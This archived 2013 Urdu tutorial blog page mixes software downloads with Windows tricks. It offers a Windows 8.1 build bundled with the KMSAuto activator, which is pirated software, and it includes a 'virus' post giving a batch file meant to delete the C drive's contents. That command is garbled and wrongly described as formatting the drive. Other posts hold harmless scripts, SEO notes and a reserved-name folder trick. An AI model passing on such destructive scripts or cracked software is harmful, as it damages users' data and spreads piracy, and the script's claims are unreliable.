Saturday, 30 November 2013

Windows 8

Information about the software :
Release date: 24/11/2013
Title : Windows 8.1 Professional x86/x64 IE11 Nov2013
Developer : MicroSoft
Version: 24/11/2013
Bit : (x86/x64)
Language: English / Russian LP / German LP / LP Ukrainian
Medicine: Present KMSAuto Net 1.0.6 Portable

System requirements :
Processor: 1 GHz or more.
RAM: 1 GB or more .
Free space on hard drive: 16 GB or more
Graphics card : graphics device Microsoft DirectX 9 or later .
Additional requirements to use certain features
To use the touch features require tablet or monitor that supports multitouch
To access the Windows Store to download and run applications that require an active internet connection and a screen resolution of at least 1024 x 768 pikseley.Dlya bind applications requires a minimum screen resolution of 1366 x 768

This assembly was based on the original images of Windows 8.1 x86/x64, including Internet Explorer 11 with stitched updates to November 2013. The system is clean.

Cusp :
Installers Windows 8.1 were harmed during the creation of this image .
No programs have been added .
Registry by the original .
the latest updates for November 2013
integrated Internet Explorer 11











Free Download Winrar 










Free Avast Antivirus Download










Camtasia Studio 7 Tutorial Urdu

Today, there is one more complete video course for you in Urdu language. This course is about Camtasia Studio 7.0 This software applications for creating video tutorials and presentations (screen video capture),














Friday, 29 November 2013

Microsoft Word PowerPoint Tutorial Urdu















Ms Word 2007 Tutorial In Urdu

I am very happy today Ms Word 2007 Complete Video Course you're going to share with people.Here in this post, you will able to learn Ms Word 2007 in Urdu This is an application software and You can make it CV, Application, Letter, Office Document and other data files and you can Type Text, Fonts, Chose Different Sizes and Colors, you can also Add Tables, Charts and Insert Graphics and many other type of documents because It is easy to understand.









Complete SEO Video Training In Urdu

Today I am telling you this Tutorial and this Tutorial Urdu and Hindi Language and see this tutorial that your website can increase the traffic ranking.In this tutorial Seo is the Complete Training you can see this tutorial and Complete SEO in your website. I'll information you a little about SEO.

What Is SEO?

Search Engine Optimization, SEO is a process that you apply to a website to increase its rank and traffic from Organic Search Engines Searches. The process target the free search where user use any of the exiting search engines such as Google, Yahoo and Bing, to search for a product service or information.It is different from a paid search , where the webmaster pays to appear a the top of the search pages.


Why Is It Important For SEO On Website?

Search Engine Optimization (SEO) refers to method and techniques that you can apply to a Website to increase its Traffic Rank and visibility in a Search Engines result page. When you Optimize your website it has a greater chance of appearing in the Search Engines Top Result, which subsequently increases the traffic to your website. The Optimization process include many techniques and methods that are applied to the website itself or their sites that are related to the website content. Understanding the SEO process requires learning about how the search process works the search page layout and the different Search Engines that you target in the process.    




Tuesday, 26 November 2013

Virus Creator














Inpage Urdu 2009 Professional











EASEUS Data Recovery Wizard Professional






Send Free SMS In Pakistan

Monday, 25 November 2013

Is Your Computer Male Or Female ?


This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. So let get started.

How To Do ?

1. Open Notepad and paste the following codes

CreateObject("SAPI.SpVoice").Speak"i love you"

2. Save the file as gender.vbs  
3. Now, open the save file  
4. If you hear male voice then your computer is male and if you hear female voice then its female.

Creating Virus That Format C Drive


In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.  

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Then Save this file as virus.bat.
3. Now, running this file format C Drive.

Cool Keyboard Tricks (Windows) Make a Disco

Keyboards usually have small LEDs which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.

This trick uses a simple Visual Basic Script which when activated makes your Scroll lock, Caps lock and Num lock LEDs flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.

To make your own live disco, follow the steps given below:-

1. Open Notepad.
2. Copy paste the exact code given below:-

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Save the file as Disco.vbs or "*.vbs".



Double click on the Saved file to see the LED lights on your keyboard go crazy and make your own cool disco.

This trick has been tested on Windows XP, Windows Vista, Windows 7 and Windows 8 and found to be working perfectly.

You can disable the keyboard disco by starting "Restart Your PC"  

Make your Computer Talk

Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-



Steps
  1. Open Notepad.
  2. Copy and paste the exact code given below.
          Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message
        3. Click on File MenuSave As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
        4.  Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.

    Now your Computer will speak / talk what you typed in Step 4. Try it yourself.

    Windows Compatibility: This VBS file can be executed on all versions of Windows including Windows XP,Windows VistaWindows 7 and Windows 8.

    Personal Experience: I personally showed this trick to many of my friends and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.

    Convert FAT32 to NTFS Without Formatting or Losing Data

    You have a flash drive or probably an external hard drive that currently has FAT32 file system and you want to change it to NTFS, because FAT32 does not support handling large files (over 4GB) or it is just simply old for your taste but there is just one problem, you don't want to lose your saved data. This article is for you then as it explains exactly how you can achieve seamless transition from FAT to NTFS without involving any data loss.



    While it is generally recommended to use the NTFS file system because of its stability, security and lesser defragmentation time, most of us end up using FAT32 because that is what most disks are preformatted with. Unless, we notice the “Not enough disk space error” despite disk space being available, we don't bother to change the file system. Moreover, most of us don't change it because of the risk of losing important data and lack of time (read laziness). As Microsoft was aware of this scenario, they added a capability in the command prompt to overcome this by executing a simple command. There are manysoftware that support this too but the Convert command is one of the easiest ways to do so. Follow the steps below to know how:-

    Important: While this method works perfectly, I would still advise you to backup your data in case anything goes wrong.

    FAT 32 to NTFS Conversion Steps

    1) Go to Computer, and note the name of the drive whose file system you wish to convert.
    2) Click on Start.
    3) Type cmd in the search bar if you use Windows 7, Windows 8 or Windows Vista. If you use Windows XP, click on Run and then execute cmd
    4) Execute "chkdsk h: /f " (without quotes) where H is the letter of the drive to undergo conversion. This checks the drive for errors and fixes them automatically.
    5) Execute "Convert H: /FS:NTFS" (without quotes). H is again the letter of the drive to be converted.
    6) The command prompt will start the conversion process and after a few minutes, CMD will say that conversion was successful.
    7) You can check it in the properties of the drive through right click<Properties.



    This works on Windows 7, Windows XP, Windows 8 and Windows Vista. I converted my flash drive's file system using these steps and it worked flawlessly. It is interesting to note that this method cannot be used to reconvert NTFS file system back to FAT32. To reconvert back to FAT32, you will need to format the entire drive which will definitely cause data loss.

    Sunday, 17 November 2013

    Tally Tutorials

















    Microsoft Access Tutorial 2010

    Microsoft Access 2010, also known as Microsoft Office Access 2010, is a database management system from Microsoft that combines the relational Microsoft Jet Database Engine with a graphical user interface and software-development tools. It is a member of the Microsoft Office suite of applications, included in the Professional and higher editions or sold separately.


















    Saturday, 16 November 2013

    Microsoft Word Excel Tutorial Urdu






    Friday, 15 November 2013

    Create A Undeletable And Unrenamable Folders In Windows


    In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system.Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

    Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

    How To Create Undeletable And Unrenamable Folders ?

    1. Go to Start and then Click on Run
    2. Type cmd & hit enter (To open Command Prompt ).
    3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the          windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
    4. Type D: or E: and hit enter
    5. Type md con\ and hit enter (md - make directory)
    6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
    7. Open that directory, you will see the folder created of name con.
    8. Try to delete that folder or rename that folder windows will show the error message.

    Thursday, 14 November 2013

    Create Your Own Search Engine


    Step 1: Click Here For Create Your Own Search Engine 
    Step 2: You will see something A Form 
    Step 3 : Fill The Details and Hurray..!!! 
    Step 4:  Don't Forget give comment and Share This Post ... :P 

     

    Copyright @ 2013 Free Tutorial in Urdu.